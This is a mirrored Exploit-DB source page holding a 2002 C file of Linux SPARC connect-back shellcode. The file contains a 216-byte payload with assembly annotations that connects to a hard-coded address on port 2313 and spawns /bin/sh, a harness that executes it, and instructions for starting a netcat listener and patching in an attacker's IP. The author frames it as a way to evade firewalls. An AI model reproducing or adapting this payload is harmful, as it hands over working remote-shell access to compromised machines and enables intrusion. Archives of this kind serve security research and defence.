bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux_sparc/shellcode/13305.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

104 lines
No EOL
3.9 KiB
C
Executable file
Raw Blame History

/* linux (sparc) connect back shellcode, because someone had to evade those firewalls. *sigh* */
/*
* OS : Linux
* Architecture : Sparc
* Type : Connect Back
* Lenght : 216 Bytes
* Listen-Port : 2313/TCP
* Default IP : 192.168.100.1 ( see how you'll change it at the end. )
*
* null bytes (0x00), breaks (0x0a), nops, fork(), ... avoided.
* was tested accordingly, couldn't optimized more.
* plug it in your code, launch nc -l -vvv -p 2313 and wait for it.
*
* (c) 2002 killah @ hack . gr
* All rights reserved.
*
*/
#define NAME "Linux Sparc Connect-Back"
char cb_linux_sparc[]=
"\x9d\xe3\xbf\x80" // save %sp, -128, %sp
"\x90\x10\x20\x02" // mov 2, %o0
"\xd0\x37\xbf\xe0" // sth %o0, [ %fp + -32 ]
"\x90\x10\x29\x09" // mov 0x909, %o0
"\xd0\x37\xbf\xe2" // sth %o0, [ %fp + -30 ]
"\x13\x30\x2a\x19" // sethi %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
"\x90\x12\x60\x01" // or %o1, 1, %o0 <- ALSO THIS.
"\xd0\x27\xbf\xe4" // st %o0, [ %fp + -28 ]
"\x90\x10\x20\x02" // mov 2, %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x94\x22\x60\x01" // sub %o1, 1, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x01" // mov 1, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x27\xbf\xf4" // st %o0, [ %fp + -12 ]
"\x92\x07\xbf\xe0" // add %fp, -32, %o1
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x94\x10\x20\x10" // mov 0x10, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x03" // mov 3, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x1a\x40\x09" // xor %o1, %o1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x02" // mov 2, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\x2d\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l6
"\xac\x15\xa1\x6e" // or %l6, 0x16e, %l6
"\x2f\x0b\xdc\xda" // sethi %hi(0x2f736800), %l7
"\x90\x0b\x80\x0e" // and %sp, %sp, %o0
"\x92\x03\xa0\x08" // add %sp, 8, %o1
"\xa6\x10\x20\x01" // mov 1, %l3
"\x94\x24\xe0\x01" // sub %l3, 1, %o2
"\x9c\x03\xa0\x10" // add %sp, 0x10, %sp
"\xec\x3b\xbf\xf0" // std %l6, [ %sp + -16 ]
"\xd0\x23\xbf\xf8" // st %o0, [ %sp + -8 ]
"\xc0\x23\xbf\xfc" // clr [ %sp + -4 ]
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x10"; // ta 0x10
int
main()
{
int (*test)();
test = (int (*)()) cb_linux_sparc;
printf("%s shellcode\n\tSize = %d\n",NAME,strlen(cb_linux_sparc));
(int)(*test)();
exit(0);
}
/*******************************************************************************
here it is the C code, that will give you the IPv4 Address of your
box, in a big-endianess style, so to replace it inside shellcode and
get the whole thing working for you.
example:
int main() { printf(" 0x%02x%02x%02x%02x\n",192,168,100,1); exit(0); }
or @ bash printf "0x%02x%02x%02x%02x\n" 192 168 100 1
i believe no further explanation needed.
********************************************************************************/
//EOF
// milw0rm.com [2004-09-26]
Reference in a new issue View git blame Copy permalink